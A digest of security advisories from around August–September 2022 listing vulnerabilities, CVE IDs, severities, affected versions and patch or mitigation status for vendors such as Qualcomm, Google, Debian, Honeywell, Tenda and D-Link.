Qualcomm has released a security bulletin to address multiple vulnerabilities affecting its
devices.
CVE ID: CVE-2022-25708 (Critical), CVE-2022-25652 (Critical), CVE-2022-22105
(Critical)
It has been discovered that Vice Society ransomware is obtaining initial network access
through compromised credentials by exploiting internet-facing applications, and is
exploiting the PrintNightmare vulnerability (CVE-2021-1675 and CVE-2021-34527) to escalate
privileges. Mitigations are available.
Multiple vulnerabilities have been discovered in Delta Electronics' equipment, DOPSoft 2,
that can allow arbitrary code execution. The affected products are DOPSoft 2 version
2.00.07 and prior. DOPSoft 2 will not receive an update to mitigate these vulnerabilities
because it is an End-of-Life (EoL) product.
CVE ID: CVE-2021-38402 (High), CVE-2021-38406 (High), CVE-2021-38404
(High)
An access of uninitialized pointer vulnerability has been discovered in Triangle Microworks'
equipment, the TMW IEC 61850 Software Library and TMW IEC 60870-6 (ICCP/TASE.2) Software
Library. Successful exploitation can lead to a Denial of Service (DoS) condition on any
server or client using the affected libraries.
CVE ID: CVE-2022-38138 (High)
AVEVA has released security updates to address multiple vulnerabilities in its equipment,
AVEVA Edge 2020 R2 SP1 and all prior versions. Successful exploitation can result in
arbitrary code execution, information disclosure, or Denial of Service (DoS).
CVE ID: CVE-2022-36970 (High), CVE-2022-28686 (High), CVE-2022-28687 (High),
CVE-2022-28688 (High), CVE-2022-28685 (High), CVE-2022-36969 (Medium)
WordPress has released security updates to address a stored Cross-Site Scripting (XSS)
vulnerability in Wordfence Security Firewall & Malware Scan plugin for WordPress. The
affected versions are Wordfence Security Firewall & Malware Scan versions up to, and
including 7.6.0.
CVE ID: CVE-2022-3144 (Medium)
Dell has released security updates to address multiple vulnerabilities in Bash, a
third-party component, that affects Dell PowerScale OneFS.
CVE ID: CVE-2019-9924 (High), CVE-2019-18276 (High), CVE-2016-7543 (High),
CVE-2016-9401 (Medium)
HP has released security updates to address a privilege escalation vulnerability in HP
Support Assistant. The affected products are HP Support Assistant versions earlier than
9.11, and Fusion versions earlier than 1.38.2601.0.
CVE ID: CVE-2022-38395 (High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Debian has released security updates to resolve several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-1049 (High), CVE-2022-2735, CVE-2022-3075, CVE-2022-27337 (Medium),
CVE-2022-38784 (High)
Android has released a security bulletin to resolve multiple vulnerabilities affecting
several Android devices. Security patch levels of 2022-09-05 or later address all of these
issues.
An incorrect access control vulnerability has been discovered in Doctor's Appointment
System via edoc/patient/settings.php. The affected version is Doctor's Appointment System
1.0.
CVE ID: CVE-2022-36202 (Critical)
A SQL Injection vulnerability has been discovered in Doctor's Appointment System. The
affected version is Doctor's Appointment System 1.0.
CVE ID: CVE-2022-36201 (Critical)
A command injection vulnerability has been discovered in Rengine via the scan engine
function. The affected version is Rengine v1.3.0.
CVE ID: CVE-2022-36566 (Critical)
It has been discovered that Quarkus does not terminate the HTTP request header context,
which can lead to unpredictable behavior. The affected version is Quarkus 2.10.x.
CVE ID: CVE-2022-2466 (Critical)
It has been discovered that Tenda AC6(AC1200) contains a vulnerability that allows an
attacker to remove the Wi-Fi password and force the device into open security mode via a
crafted packet sent to goform/setWizard. The affected versions are Tenda AC6(AC1200) v5.0
Firmware v02.03.01.114 and below.
CVE ID: CVE-2022-37176 (Critical)
A command injection vulnerability has been discovered in WAVLINK that allows execution of
arbitrary commands via the username parameter. The affected version is WAVLINK WL-WN575A3
RPT75A3.V4300.201217.
CVE ID: CVE-2022-37149 (Critical)
Cognex has released security updates to address multiple vulnerabilities in its equipment,
the 3D-A1000 Dimensioning System. Successful exploitation can result in unauthorised
password changes, escalation of privileges, falsifying of password logs, and bypassing of
web access controls.
CVE ID: CVE-2022-1368 (Critical), CVE-2022-1522 (Medium), CVE-2022-1525
(Critical)
Hitachi Energy has released security updates and mitigations to address multiple
vulnerabilities in Hitachi Energy's equipment, the AFS660/AFS665 series and MicroSCADA
Pro/X SYS600 products. An attacker can exploit these vulnerabilities to take control of an
affected system.
CVE ID: CVE-2020-6994 (Critical), CVE-2022-0778 (High), CVE-2020-25692 (High),
CVE-2022-1778 (High), CVE-2022-2277 (High), CVE-2022-29922 (High), CVE-2022-29490 (High),
CVE-2022-29492 (Medium)
A reflected Cross-Site Scripting (XSS) vulnerability has been discovered in the Desktop
Laptop Option (DLO) application login page. Successful exploitation allows injection of
arbitrary web script into an HTTP parameter that reflects the user input without
sanitization, due to improper neutralization of input during web page generation. The
affected versions are Veritas Desktop Laptop Option (DLO) versions 9.7, 9.6, 9.5, 9.4,
9.3.3, 9.3.2, 9.3.1, 9.3, 9.2, 9.1 and earlier unsupported versions.
Ubuntu has released security updates to address several vulnerabilities in Linux kernel. An
attacker can exploit these vulnerabilities to take control of an affected system.
GitLab has released Community Edition and Enterprise Edition version 15.3.3 to resolve a
number of regressions and bugs in 15.3 release and prior versions.
SYNCK GRAPHICA has released a security update to address an information disclosure
vulnerability in Mailform Pro CGI. The affected versions are Mailform Pro CGI 4.3.1 and
earlier.
CVE ID: CVE-2022-38400 (Low)
HarmonyOS has released a security bulletin to address multiple vulnerabilities affecting
several Huawei phones and tablets that run HarmonyOS. Security patch levels of 2022-09-01 or
later address all of these issues.
CVE ID: CVE-2022-38990 (Critical), CVE-2022-38993 (Critical), CVE-2022-39006
(Critical), CVE-2022-38987 (Critical)
QNAP has released security updates to fix a vulnerability related to the Deadbolt
ransomware attack on QNAP NAS devices running Photo Station with internet exposure. The
affected products are QTS 5.0.1: Photo Station 6.1.2 and later, QTS 5.0.0/4.5.x: Photo
Station 6.0.22 and later, QTS 4.3.6: Photo Station 5.7.18 and later, QTS 4.3.3: Photo
Station 5.4.15 and later, and QTS 4.2.6: Photo Station 5.2.14 and later.
Google has released Extended Stable channel 104.0.5112.114 for Windows and Mac, Chrome 105
(105.0.5195.77) for Android, Chrome Beta 106 (106.0.5249.23) for Android, and Stable channel
105.0.5195.102 for Windows, Mac and Linux to resolve the vulnerability. An exploit for an
insufficient data validation vulnerability (CVE-2022-3075) exists in the wild.
CVE ID: CVE-2022-3075 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Cisco released a security update to resolve a vulnerability in the MPLS Operation,
Administration, and Maintenance (OAM) feature of Cisco NX-OS Software that can cause a
Denial of Service (DoS) condition on an affected device.
CVE ID: CVE-2021-1588 (High)
WordPress has released security updates to address a security protection bypass
vulnerability in WP Cerber Security, Anti-spam & Malware Scan plugin for WordPress. The
affected versions are WP Cerber Security, Anti-spam & Malware Scan versions up to, and
including 9.1.
CVE ID: CVE-2022-2939 (Medium)
Microsoft has released an updated Microsoft Edge Stable Channel (Version 105.0.1343.27).
This update contains a fix for CVE-2022-3075, which has an exploit in the wild.
A SQL injection vulnerability has been discovered in Clinic's Patient Management System via
the id parameter at /pms/update_patient.php. The affected version is Clinic's Patient
Management System v1.0.
CVE ID: CVE-2022-36609 (Critical)
A SQL injection vulnerability has been discovered in Mapper via the ids parameter in the
selectByIds function. The affected versions are Mapper v4.0.0 to v4.2.0.
CVE ID: CVE-2022-36594 (Critical)
It has been discovered that Seiko SkyBridge MB-A200 v01.00.04 and below contains multiple
hard-coded passcodes for root. Adversaries are able to access the passcodes at
/etc/srapi/config/system.conf and /usr/sbin/ssol-sshd.sh.
CVE ID: CVE-2022-36560 (Critical)
A command injection vulnerability has been discovered in Seiko SkyBridge MB-A200 via the
Ping parameter at ping_exec.cgi. The affected versions are Seiko SkyBridge MB-A200 v01.00.04
and below.
CVE ID: CVE-2022-36559 (Critical)
A command injection vulnerability has been discovered in Seiko SkyBridge MB-A100/A110 via
the ipAddress parameter at 07system08execute_ping_01. The affected versions are Seiko
SkyBridge MB-A100/A110 v4.2.0 and below.
CVE ID: CVE-2022-36556 (Critical)
A command injection vulnerability has been discovered in Hytec Inter HWL-2511-SS via the
component /www/cgi-bin/popen.cgi. The affected versions are Hytec Inter HWL-2511-SS v1.05
and below.
CVE ID: CVE-2022-36553 (Critical)
Alfasad has released security updates to address a command injection vulnerability in the
PowerCMS XMLRPC API. The affected versions are PowerCMS 6.021 and earlier, PowerCMS 5.21 and
earlier, PowerCMS 4.51 and earlier, and PowerCMS 3 Series and earlier (which are
unsupported, End-of-Life (EOL) versions).
CVE ID: CVE-2022-33941 (Critical)
An OS command injection vulnerability via ReaderNo has been discovered in Nortek Linear
eMerge E3-Series devices before 0.32-08f.
CVE ID: CVE-2022-31499 (Critical)
It has been discovered that Printix Secure Cloud Print Management incorrectly used
privileged APIs to modify values in HKEY_LOCAL_MACHINE via UITasks.PersistentRegistryData.
The affected versions are Printix Secure Cloud Print Management through 1.3.1106.0.
CVE ID: CVE-2022-25089 (Critical)
Multiple vulnerabilities have been discovered in UNISOC's BootROM. An attacker can exploit
these vulnerabilities to take control of an affected system. The mitigations are available.
CVE ID: CVE-2022-38691 (Critical), CVE-2022-38692 (Critical), CVE-2022-38693 (High),
CVE-2022-38694 (High), CVE-2022-38695 (Medium), CVE-2022-38696 (Medium)
Debian has released a security update to address multiple vulnerabilities in Chromium, which
can result in the execution of arbitrary code, Denial of Service (DoS) or information
disclosure.
CVE ID: CVE-2022-3038, CVE-2022-3039, CVE-2022-3040, CVE-2022-3041, CVE-2022-3042,
CVE-2022-3043, CVE-2022-3044, CVE-2022-3045, CVE-2022-3046, CVE-2022-3047, CVE-2022-3048,
CVE-2022-3049, CVE-2022-3050, CVE-2022-3051, CVE-2022-3052, CVE-2022-3053, CVE-2022-3054,
CVE-2022-3055, CVE-2022-3056, CVE-2022-3057, CVE-2022-3058, CVE-2022-3071
It has been discovered that Hytec Inter HWL-2511-SS implements a SHA512crypt hash for the
root account which can be easily cracked via a brute-force attack. The affected versions are
Hytec Inter HWL-2511-SS v1.05 and below.
CVE ID: CVE-2022-36555 (Critical)
A command injection vulnerability has been discovered in the CLI (Command Line Interface)
implementation of Hytec Inter HWL-2511-SS that allows attackers to execute arbitrary
commands with root privileges. The affected versions are Hytec Inter HWL-2511-SS v1.05 and
below.
CVE ID: CVE-2022-36554 (Critical)
A SQL injection vulnerability has been discovered in the ApolloTheme AP PageBuilder
component for PrestaShop that allows unauthenticated attackers to exfiltrate database data.
The affected versions are ApolloTheme AP PageBuilder component through 2.4.4.
CVE ID: CVE-2022-22897 (Critical)
It has been discovered that the morgan-json package is vulnerable to arbitrary code
execution due to missing sanitization of input passed to the Function constructor. All
versions of the morgan-json package are vulnerable.
CVE ID: CVE-2022-25921 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in Sinsiu Enterprise Website
System. The affected version is Sinsiu Enterprise Website System v1.1.1.0.
CVE ID: CVE-2022-36572 (Critical)
A SQL injection vulnerability has been discovered in Ingredients Stock Management System.
The affected version is Ingredients Stock Management System V1.0.
CVE ID: CVE-2022-36706 (Critical)
A SQL injection vulnerability has been discovered in Ingredients Stock Management System.
The affected version is Ingredients Stock Management System V1.0.
CVE ID: CVE-2022-36705 (Critical)
A command injection vulnerability has been discovered in D-Link GO-RT-AC750
GORTAC750_revA_v101b03 and GO-RT-AC750_revB_FWv200b02 via /cgibin, hnap_main.
CVE ID: CVE-2022-37056 (Critical)
A buffer overflow vulnerability has been discovered in D-Link Go-RT-AC750
GORTAC750_revA_v101b03 and GO-RT-AC750_revB_FWv200b02 via cgibin, hnap_main.
CVE ID: CVE-2022-37055 (Critical)
Contec has released security updates to address multiple vulnerabilities in FLEXLAN FX3000
and FX2000 series. The affected versions are FLEXLAN FX3000 series prior to ver.1.16.00, and
FLEXLAN FX2000 series prior to ver.1.39.00.
CVE ID: CVE-2022-36158 (High), CVE-2022-36159 (High)
Multiple vulnerabilities have been discovered in Contec Health's equipment, the CMS8000
CONTEC ICU CCU Vital Signs Patient Monitor, that can allow a threat actor to cause a Denial
of Service (DoS) condition, modify firmware with physical access to the device, access a
root shell, or employ hard-coded credentials to make configuration changes.
CVE ID: CVE-2022-36385 (Medium), CVE-2022-38100 (High), CVE-2022-38069 (Medium),
CVE-2022-38453 (Low), CVE-2022-3027 (Medium)
An out-of-bounds read vulnerability has been discovered in Delta Electronics' equipment,
DOPSoft, that can allow an attacker to gain sensitive information.
CVE ID: CVE-2022-2966 (Low)
Dell has released security updates to address an improper certificate validation
vulnerability in Dell OS10 SupportAssist. A remote unauthenticated user can exploit this
vulnerability, leading to unauthorized access to limited switch configuration data that can
be leveraged to conduct Man-in-The-Middle (MiTM) attacks. The affected version is Dell OS10
version 10.5.3.4.
CVE ID: CVE-2022-34394 (Low)
Google has released Chrome Beta 106 (106.0.5249.10) for iOS, Dev channel 107.0.5263.0
(Platform version: 15081.0.0) for a limited set of ChromeOS devices, Beta channel
106.0.5249.14 (Platform version: 15054.18.0/15054.19.0) for most ChromeOS devices, Chrome
106 (106.0.5249.21) Beta channel for Windows, Linux and Mac, Chrome Stable 105
(105.0.5195.98) for iOS, Chrome Dev 107 (107.0.5271.2) for Android, and Dev channel
106.0.5249.21 for Windows, Mac & Linux.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Huawei has released a security update to address an out-of-bounds read and write
vulnerability in Huawei Headset products. An attacker can exploit this vulnerability to
take control of an affected system.
CVE ID: CVE-2020-36602 (High)
Ubuntu has released security updates to address an out-of-bounds write vulnerability in
Linux kernel that can cause a Denial of Service (DoS) or possibly execute arbitrary code.
The affected products are Ubuntu 16.04 ESM, and Ubuntu 14.04 ESM.
CVE ID: CVE-2021-33656 (High)
WordPress has released security updates to address multiple Cross-Site Scripting (XSS)
vulnerabilities in the Image Hover Effects Ultimate plugin for WordPress. The affected
versions are Image Hover Effects Ultimate (Image Gallery, Effects, Lightbox, Comparison or
Magnifier) versions up to, and including, 9.7.3.
CVE ID: CVE-2022-2935 (Medium), CVE-2022-2936 (Medium), CVE-2022-2937
(Medium)
Mozilla has released security updates to address multiple vulnerabilities in Thunderbird
102.2.1. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-3033 (High), CVE-2022-3032 (Medium), CVE-2022-3034 (Medium),
CVE-2022-36059 (Medium)
Apple has released security updates to address an out-of-bounds write vulnerability in iOS
12.5.6 for iPhone and iPod touch. Processing maliciously crafted web content can lead to
arbitrary code execution. The affected products are iPhone 5s, iPhone 6, iPhone 6 Plus, iPad
Air, iPad mini 2, iPad mini 3, and iPod touch (6th generation).
CVE ID: CVE-2022-32893
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
It has been discovered that Edoc-doctor-appointment-system contains a SQL injection
vulnerability via the id parameter at /patient/settings.php. The affected version is
Edoc-doctor-appointment-system v1.0.1.
CVE ID: CVE-2022-36545 (Critical)
A SQL injection vulnerability has been discovered in Edoc-doctor-appointment-system via the
id parameter at /patient/booking.php. The affected version is Edoc-doctor-appointment-system
v1.0.1.
CVE ID: CVE-2022-36544 (Critical)
It has been discovered that Edoc-doctor-appointment-system contains a SQL injection
vulnerability via the id parameter at /patient/doctors.php. The affected version is
Edoc-doctor-appointment-system v1.0.1.
CVE ID: CVE-2022-36543 (Critical)
A weak password vulnerability has been discovered in the management system of RuoYi. The
affected version is RuoYi v3.8.3.
CVE ID: CVE-2022-37158 (Critical)
An arbitrary file execution vulnerability has been discovered in the container package in
MikroTik RouterOS. The affected version is MikroTik RouterOS 7.4beta4.
CVE ID: CVE-2022-34960 (Critical)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2021-40663 (Critical), CVE-2022-29078 (Critical), CVE-2022-29968 (High),
CVE-2022-1116 (High)
Multiple vulnerabilities have been discovered in PLANEX Network camera products SmaCam
CS-QR10 and SmaCam Night Vision CS-QR20 that can cause execution of arbitrary OS command on
the affected products.
CVE ID: CVE-2022-38399 (Medium), CVE-2017-12576 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Fuji Electric has released security updates to address out-of-bounds read and
write-what-where condition vulnerabilities in its equipment, D300win. Successful
exploitation can result in loss of sensitive data and manipulation of information.
CVE ID: CVE-2022-1738 (High), CVE-2022-1523 (Medium)
A cleartext transmission of sensitive information OT:ICEFALL vulnerability has been
discovered in Honeywell's equipment, the Trend Controls IQ Series (all versions that use
the Inter-Controller (IC) protocol). Successful exploitation can cause the loss of
authentication information in cleartext by sniffing network traffic. The mitigations are
available.
CVE ID: CVE-2022-30312 (High)
A use-after-free vulnerability has been discovered in Omron's equipment, CX-Programmer.
Successful exploitation can allow an attacker to execute arbitrary code. The affected
products are Omron CX-Programmer, all versions prior to v9.78. The mitigations are
available.
CVE ID: CVE-2022-2979 (High)
Johnson Controls has released a security update to resolve a vulnerability in its product
iSTAR Ultra. An unauthenticated user can craft an HTTP post request to run arbitrary
commands as root user. The affected products are all iSTAR Ultra firmware versions prior to
6.8.9.CU01. The mitigations are available.
CVE ID: CVE-2022-21941
WordPress has released security updates to address multiple stored Cross-Site Scripting
(XSS) vulnerabilities in Beaver Builder WordPress Page Builder plugin for WordPress. The
affected versions are Beaver Builder WordPress Page Builder versions up to, and including
2.5.5.2.
CVE ID: CVE-2022-2517 (Medium), CVE-2022-2695 (Medium)
Dell has released security updates to address multiple vulnerabilities in the third-party
component PostgreSQL that affect several Dell NetWorker products.
HP has released security updates to address a Denial of Service (DoS) vulnerability in HP
Print and Digital Send products.
CVE ID: CVE-2022-0778 (Medium)
Debian has released a security update to address a buffer overflow vulnerability in the
vhost code of DPDK, which can result in Denial of Service (DoS) or the execution of
arbitrary code by malicious guests/containers.
CVE ID: CVE-2022-2132, CVE-2022-28199
It has been discovered that Le-yan Personnel and Salary Management System has a hard-coded
database account and password within the website source code. An unauthenticated remote
attacker can access or modify system data, or disrupt service.
CVE ID: CVE-2022-38116 (Critical)
A use-after-free vulnerability has been discovered in the storage component of Google Chrome
prior to 100.0.4896.88 that allows a malicious extension to potentially perform a sandbox
escape via a crafted Chrome Extension.
CVE ID: CVE-2022-1312 (Critical)
Multiple vulnerabilities in open-source software components (JQuery, GoAhead Embedded
Webserver, and Curl) have been discovered in Hitachi Energy's equipment, the MSM products,
that can disrupt the functionality of the MSM web interface, steal sensitive user
credentials, or cause a Denial of Service (DoS) condition. The affected products are MSM
version 2.2 and earlier.
CVE ID: CVE-2015-6584 (Medium), CVE-2016-7103 (Medium), CVE-2011-4273 (Medium),
CVE-2018-16842 (Critical), CVE-2016-9586 (High), CVE-2016-8617 (High), CVE-2016-8618
(Critical), CVE-2016-8619 (Critical), CVE-2016-8621 (High), CVE-2016-7167 (Critical),
CVE-2014-3707 (Medium), CVE-2013-2174 (Medium), CVE-2014-0138 (Medium)
Honeywell has released security updates to address a missing authentication for critical
function OT:ICEFALL vulnerability in Honeywell's equipment, ControlEdge. Successful
exploitation can allow full control of the device, which can include Remote Code Execution
(RCE), Denial of Service (DoS), or configuration manipulation.
CVE ID: CVE-2022-30318 (Critical)
A missing authentication for critical function OT:ICEFALL vulnerability has been discovered
in Honeywell's equipment, Experion LX, that can allow configuration manipulation and a
Denial of Service (DoS) condition. The mitigations are available.
CVE ID: CVE-2022-30317 (Critical)
Multiple vulnerabilities, including a heap-based buffer overflow and a stack-based buffer
overflow, have been discovered in PTC's equipment, Kepware KEPServerEX, that can allow an
adversary to crash the device or remotely execute arbitrary code. The affected products are
Kepware KEPServerEX v6.11 or lower, ThingWorx Kepware Server v6.11 or lower, ThingWorx
Industrial Connectivity all versions, OPC-Aggregator v6.11 or lower, ThingWorx Kepware Edge
v1.4 or lower, Rockwell Automation KEPServer Enterprise v6.11 or lower, GE Digital
Industrial Gateway Server v7.611 or lower, and Software Toolbox TOP Server v6.11 or lower.
The mitigations are available.
CVE ID: CVE-2022-2848 (Critical), CVE-2022-2825 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-34568 (High), CVE-2022-2787, CVE-2022-2526
NVIDIA has released a security update for Data Plane Development Kit (MLNX_DPDK) to address
a vulnerability that can cause denial of service, and some impact to data integrity and
confidentiality.
CVE ID: CVE-2022-28199 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
It has been discovered that the package com.google.code.gson:gson is vulnerable to
Deserialization of Untrusted Data via the writeReplace() method in internal classes, which
can lead to DoS attacks. This vulnerability allows a remote, authenticated attacker to cause
a denial-of-service (DoS) on the F5 BIG-IP system specific to the iAppsLX service, and the
BIG-IQ system specific to the iControl REST framework.
CVE ID: CVE-2022-25647 (Medium)
Debian has released security updates to address multiple vulnerabilities in Thunderbird,
which can result in denial of service or the execution of arbitrary code.
CVE ID: CVE-2022-38472 (High), CVE-2022-38473 (High), CVE-2022-38478
(High)
NetApp has released security updates to address multiple vulnerabilities in Java Platform
Standard Edition that affect several NetApp products.
CVE ID: CVE-2022-21540 (Medium), CVE-2022-21541 (Medium), CVE-2022-21549 (Medium),
CVE-2022-34169 (High)
It has been discovered that MDaemon Technologies' SecurityGateway for Email Server contains
an HTTP response splitting vulnerability via the data parameter. The affected version is
SecurityGateway for Email Servers 8.5.2.
CVE ID: CVE-2022-37242 (Critical)
It has been discovered that H3C H200 H200V100R004 contains a stack overflow vulnerability
via the function UpdateMacClone.
CVE ID: CVE-2022-37100 (Critical)
It has been discovered that in Apache Maven maven-shared-utils the Commandline class can
emit double-quoted strings without proper escaping, allowing shell injection attacks. The
affected versions are Apache Maven maven-shared-utils prior to version 3.3.3.
CVE ID: CVE-2022-29599 (Critical)
Aruba has released security updates to address an authenticated remote command injection
vulnerability in Aruba ClearPass Policy Manager. The affected versions are Aruba ClearPass
Policy Manager versions 6.10.4 and below, 6.9.9 and below, 6.8.9-HF2 and below, 6.7.x and
below.
CVE ID: CVE-2022-23663 (Critical)
It has been discovered that Ricoh Device Software Manager installer contains a vulnerability
in the DLL search path, which can lead to insecure loading of Dynamic Link Libraries.
Arbitrary code can be executed with the privilege of the user invoking the installer. The
affected versions are Installer of Device Software Manager prior to Ver.2.20.3.0.
CVE ID: CVE-2022-36403 (High)
Multiple vulnerabilities have been discovered in CentreCOM AR260S V2. A remote attacker can
execute an arbitrary OS command. The affected versions are CentreCOM AR260S V2 firmware
prior to Ver.3.3.7.
CVE ID: CVE-2022-35273 (High), CVE-2022-38394 (High), CVE-2022-34869 (High),
CVE-2022-38094 (High)
It has been discovered that NVFLARE contains a deserialization of untrusted data
vulnerability due to Pickle usage that allows an unprivileged network attacker to cause
Remote Code Execution, Denial of Service, and impact to both Confidentiality and Integrity.
The affected versions are NVFLARE prior to 2.1.4.
CVE ID: CVE-2022-34668 (Critical)
A memory corruption vulnerability has been discovered in the kernel PowerVR GPU driver that
allows unprivileged apps to allocate pinned memory, unpin it (which makes it available to
be freed), and continue using the page in GPU calls.
CVE ID: CVE-2022-20122 (Critical)
Google has released Dev channel 106.0.5249.12 (Platform version: 15054.14.0) for most
ChromeOS devices, and Chrome Beta 105 (105.0.5195.68) for Android.
Foxit has released an updated Foxit PDF Editor 11.2.3 to resolve multiple vulnerabilities in
Foxit PDF Editor 11.2.2.53575 and all previous 11.x versions, 10.1.8.37795 and earlier.
A SQL injection vulnerability has been discovered in Online Diagnostic Lab Management
System. The affected version is Online Diagnostic Lab Management System 1.0.
CVE ID: CVE-2022-37152 (Critical)
A SQL injection vulnerability has been discovered in Simple Task Scheduling System. The
affected version is Simple Task Scheduling System 1.0.
CVE ID: CVE-2022-36683 (Critical)
A SQL injection vulnerability has been discovered in Ingredients Stock Management System.
The affected version is Ingredients Stock Management System 1.0.
CVE ID: CVE-2022-36697 (Critical)
It has been discovered that Claroline contains a remote code execution vulnerability via
arbitrary file upload. The affected versions are Claroline 13.5.7 and prior.
CVE ID: CVE-2022-37159 (Critical)
A stack overflow vulnerability has been discovered in Tenda AC1206. The affected version is
Tenda AC1206 V15.03.06.23.
CVE ID: CVE-2022-37815 (Critical)
A broken authentication vulnerability has been discovered in the yotuwp Video Gallery plugin
for WordPress. The affected versions are yotuwp Video Gallery plugin 1.3.4.5 and prior.
CVE ID: CVE-2022-35726 (Critical)
A missing authentication for critical function vulnerability has been discovered in UNIMO
Technology digital video recorders that allows a remote unauthenticated attacker to execute
an arbitrary OS command by sending a specially crafted request to the affected device's web
interface.
CVE ID: CVE-2022-35733 (Critical)
A directory traversal vulnerability has been discovered in the unzipDirectory functionality
of WWBN AVideo and dev master commit 3f7c0364. A specially-crafted HTTP request can lead to
arbitrary command execution.
CVE ID: CVE-2022-30547 (Critical)
A server-side request forgery (SSRF) vulnerability has been discovered in wkhtmlTOpdf that
allows an attacker to get initial access into the target's system by injecting an iframe tag
with an internal asset IP address in its source. The affected version is wkhtmlTOpdf 0.12.6.
CVE ID: CVE-2022-35583 (Critical)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2021-40663 (Critical), CVE-2022-21151 (Medium), CVE-2022-31627
(Critical), CVE-2022-32083 (High), CVE-2022-32086 (High), CVE-2022-34903 (Medium),
CVE-2022-34918 (High), CVE-2022-2056 (Medium), CVE-2022-2057 (Medium), CVE-2022-2058
(Medium)
An out-of-bounds write vulnerability has been discovered in FATEK Automation's Equipment-
FvDesigner that can cause Remote Code Execution (RCE).
CVE ID: CVE-2022-2866 (High)
Google has released Chrome Dev 106 (106.0.5249.9) for Android, Dev channel 106.0.5249.12 for
Windows, Mac and Linux, and Chrome Beta 105 (105.0.5195.58) for Android.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
It has been discovered that Tenda AC1206 contains a stack overflow vulnerability via the
function fromSetIpMacBind. The affected version is Tenda AC1206 V15.03.06.23.
CVE ID: CVE-2022-37816 (Critical)
An arbitrary code execution vulnerability has been discovered in the file upload wizard of
Zengenti Contensis Classic. The affected versions are Zengenti Contensis Classic before
15.2.1.79.
CVE ID: CVE-2022-34919 (Critical)
Debian has released a security update to address a heap-based buffer overflow vulnerability
in the zlib package, which can result in Denial of Service (DoS) or potentially the
execution of arbitrary code if specially crafted input is processed.
CVE ID: CVE-2022-37434 (Critical)
Ubuntu has released security updates to address several vulnerabilities in the
linux-azure-fde package - Linux kernel (Azure CVM). An attacker can exploit these
vulnerabilities to take control of an affected system. The affected product is Ubuntu 20.04
LTS.
CVE ID: CVE-2022-1974, CVE-2022-0494, CVE-2022-34918, CVE-2022-1734, CVE-2022-1975,
CVE-2022-1652, CVE-2022-28893, CVE-2022-1048, CVE-2022-2588, CVE-2022-1679,
CVE-2022-2586
F5 has released security updates to address an improper resource shutdown or release
vulnerability in BIG-IP systems that can cause a degradation of service and can lead to a
Denial of Service (DoS) on the BIG-IP system.
CVE ID: CVE-2022-35240 (High)
Atlassian has released a security update to address a command injection vulnerability in
Bitbucket Server and Data Center. All versions of Bitbucket Server and Data Center after
6.10.17 including 7.0.0 and newer are affected by this vulnerability.
CVE ID: CVE-2022-36804 (Critical)
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-20823 (High), CVE-2022-20824 (High), CVE-2022-20921 (High),
CVE-2022-20865 (Medium)
SonicWall has released security updates to address Heap-based Buffer Overflow, and Exposure
of Sensitive Information vulnerabilities in the SonicWall SMA100 appliance.
CVE ID: CVE-2022-2915 (High)
An access bypass vulnerability has been discovered in Commerce Elavon, a third-party library
used by Drupal. Commerce Elavon has released security update to address this vulnerability.
Google has released Dev channel 106.0.5249.7 (Platform version: 15054.10.0) for most
ChromeOS devices, Beta channel 105.0.5195.52 for Windows, Mac and Linux, and Chrome Beta 105
(105.0.5195.47) for Android.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2022-1552 (High), CVE-2020-35513 (Medium)
Debian has released security updates to resolve several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2021-30560 (High), CVE-2022-38472 (Medium), CVE-2022-38473,
CVE-2022-38478, CVE-2022-31676
An SMM memory corruption vulnerability has been discovered in InsydeH20 that affects NetApp
products and can lead to disclosure of sensitive information, addition or modification of
data, or Denial of Service (DoS).
CVE ID: CVE-2021-33625 (High)
A SQL injection vulnerability has been discovered in line 132 of admin/area.php of Bluecms.
The affected version is Bluecms 1.6.
CVE ID: CVE-2022-37113 (Critical)
A SQL injection vulnerability has been discovered in line 55 of admin/model.php of
Bluecms. The affected version is Bluecms 1.6.
CVE ID: CVE-2022-37112 (Critical)
A SQL injection vulnerability has been discovered in line 132 of admin/article.php of
Bluecms. The affected version is Bluecms 1.6.
CVE ID: CVE-2022-37111 (Critical)
A SQL injection vulnerability has been discovered in JFinal CMS via
/jfinal_cms/system/role/list. The affected version is JFinal CMS 5.1.0.
CVE ID: CVE-2022-37223 (Critical)
A SQL injection vulnerability has been discovered in JFinal CMS via
/jfinal_cms/system/user/list. The affected version is JFinal CMS 5.1.0.
CVE ID: CVE-2022-37199 (Critical)
An arbitrary file deletion vulnerability has been discovered in taocms that allows an
attacker to delete files on the server. The affected version is taocms 3.0.2.
CVE ID: CVE-2022-36261 (Critical)
It has been discovered that HTTP applications (servers) based on Crow can allow a
Use-After-Free and code execution when HTTP pipelining is used. The affected versions are
Crow through 1.0+4.
CVE ID: CVE-2022-38667 (Critical)
A buffer overflow vulnerability has been discovered in D-link DIR-816. The affected version
is D-link DIR-816 A2_v1.10CNB04.img.
